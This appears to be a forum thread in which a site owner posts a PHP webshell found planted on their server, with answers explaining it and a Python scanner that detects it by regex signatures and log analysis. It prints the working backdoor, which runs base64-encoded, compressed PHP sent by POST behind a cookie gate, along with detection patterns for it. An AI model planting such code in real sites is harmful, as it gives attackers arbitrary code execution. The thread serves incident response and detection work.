I have discovered the following code appearing in two identical .php files on more than one of my server's websites. The files have inconspicuous names such as "reminder.php" (but a different name every time) and appear in my /scripts/ and /uploads/ folders, sometimes in other folders instead.
Their appearance is not entirely random, but I don't know enough about Apache servers or PHP to know (a) how it got there or (b) what it does.
Checking the logs, they all appeared at similar times and were called once, and that is all.
Any help would be greatly appreciated.
```php
<?php
// Gate: only a client presenting a cookie named "adm" gets past this line.
if (isset($_COOKIE["adm"])) {
    // Both POST fields must be present: the payload ("cmd") and its checksum ("crc").
    if (isset($_POST['crc'], $_POST['cmd'])) {
        // Unsigned CRC32 of the raw (still-encoded) payload must match the supplied crc.
        if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
            // Decode base64, decompress (zlib), then execute the result as PHP.
            eval(gzuncompress(base64_decode($_POST['cmd'])));
        } else {
            // Checksum mismatch: tell the client to resend the command.
            echo "repeat_cmd";
        }
    }
}
```
Yes, of course they could - if the server is penetrated then any file on it is visible. Yes, it's entirely possible for someone to hack a server, via an exploit, or by stealing your password, or via buggy code you or others have written, or a number of different ways.
There are three ways to set up PHP to work with Apache 2.x on Windows. PHP can be run as a handler, as a CGI, or under FastCGI. Note: Remember that when adding path values in the Apache configuration files on Windows, all backslashes such as c:\directory\file.
After Apache decides that it is a PHP file, it gives it to the PHP interpreter. When PHP receives the file it reads through it and executes any PHP code it can find. After it is done with the file, the PHP interpreter gives the output of the code, if any, back to Apache.
The file allows malicious person(s) to execute any PHP code they want on your system.
Basically, if certain validations have been met (i.e. the malicious person has that given cookie value), it will take the POSTed "cmd", base64 decode it, gzip uncompress it, and evaluate it as PHP.
I'd recommend changing your passwords, and maybe reinstalling Apache for good measure. Remove these files immediately as well, or if at all remotely possible, restore from a backup.
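To go from "what does it do" to "where else is it, and when was it used", the following is an added example (not code from the question or from either answer) that does two things a responder would want here: it scans a directory tree for PHP files carrying the exact constructs of the posted shell (the `$_COOKIE["adm"]` gate, the `sprintf('%u', crc32(...))` check, and the `eval(gzuncompress(base64_decode($_POST...` chain), and it picks POST requests to .php files under /uploads/ or /scripts/ out of Apache combined-format access log lines, which is what the "called once" entries in the question would look like. The log lines, the benign file and the directory names are constructed for the example; the shell sample is the code from the question.

```python
import os
import re
import tempfile

# Indicators taken directly from the posted shell. A different shell will use
# different constructs, so these catch this family, not webshells in general.
COOKIE_GATE = re.compile(r'\$_COOKIE\s*\[\s*[\'"]adm[\'"]\s*\]')
CRC_CHECK = re.compile(r"sprintf\s*\(\s*'%u'\s*,\s*crc32\s*\(")
EVAL_CHAIN = re.compile(r'eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*\$_POST')
INDICATORS = (("cookie_gate", COOKIE_GATE), ("crc_check", CRC_CHECK), ("eval_chain", EVAL_CHAIN))

# The shell as posted in the question (used as the positive sample).
SAMPLE_SHELL = """<?php
if (isset($_COOKIE["adm"])) {
if (isset($_POST['crc'], $_POST['cmd'])) {
if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
eval(gzuncompress(base64_decode($_POST['cmd'])));
} else
echo "repeat_cmd";
}
}
"""
# Constructed benign file: uses base64 and crc32 legitimately, should not match.
BENIGN_PHP = "<?php echo base64_encode('hello'), ' ', crc32('hello');\n"

# Constructed Apache combined-format log lines (not real logs from any server).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2013:03:12:45 +0000] "POST /uploads/reminder.php HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2013:03:12:46 +0000] "POST /scripts/notice.php HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Mar/2013:03:15:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2013:03:16:20 +0000] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
LOG_RX = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def scan_php_source(src):
    """Return the names of the shell indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS if rx.search(src)]


def scan_tree(root):
    """Walk root and map each .php file (relative path) to its matched indicators."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def suspicious_requests(log_lines, dirs=("/uploads/", "/scripts/")):
    """POST requests to .php files inside directories that should not hold executable code.

    Returns (client ip, timestamp, path, status) tuples, in log order, so the
    first hit gives the time the shell was actually used."""
    out = []
    for line in log_lines:
        m = LOG_RX.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if (m.group("method") == "POST" and path.lower().endswith(".php")
                and any(d in path for d in dirs)):
            out.append((m.group("ip"), m.group("ts"), path, m.group("status")))
    return out


def demo():
    """Build a throwaway tree with one shell and one benign file, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        with open(os.path.join(root, "uploads", "reminder.php"), "w") as fh:
            fh.write(SAMPLE_SHELL)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(BENIGN_PHP)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print("webshell indicators in", path, ":", ", ".join(hits))
    for ip, ts, path, status in suspicious_requests(SAMPLE_LOG):
        print("suspicious POST", ip, ts, path, status)
```

Run the file scanner over the document root of every site on the host, not just the ones where you already found a copy, and treat the earliest timestamp from the log scan as the lower bound for when the host was compromised: whatever created the files (a vulnerable upload form, stolen credentials) happened before that. Signature matching like this only finds variants that keep the posted constructs; an attacker who re-encodes the shell will slip past it, which is why the answers below recommend a full analysis rather than just deleting the files.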
This code will execute (on the server) any arbitrary code it finds in the POST request if the key adm is present in the client's cookie. That request will be Base64 encoded and encrypted to obfuscate its contents. Any code at all may be executed, including one to format your hard drive (if your PHP server is set to allow that).
You have been hacked. Take the server offline, right now. Get some help running an analysis before you wipe your host, if you can - you don't want to reinstall and go online, just to get hacked again. Changing all your passwords and locking down your server is a good start.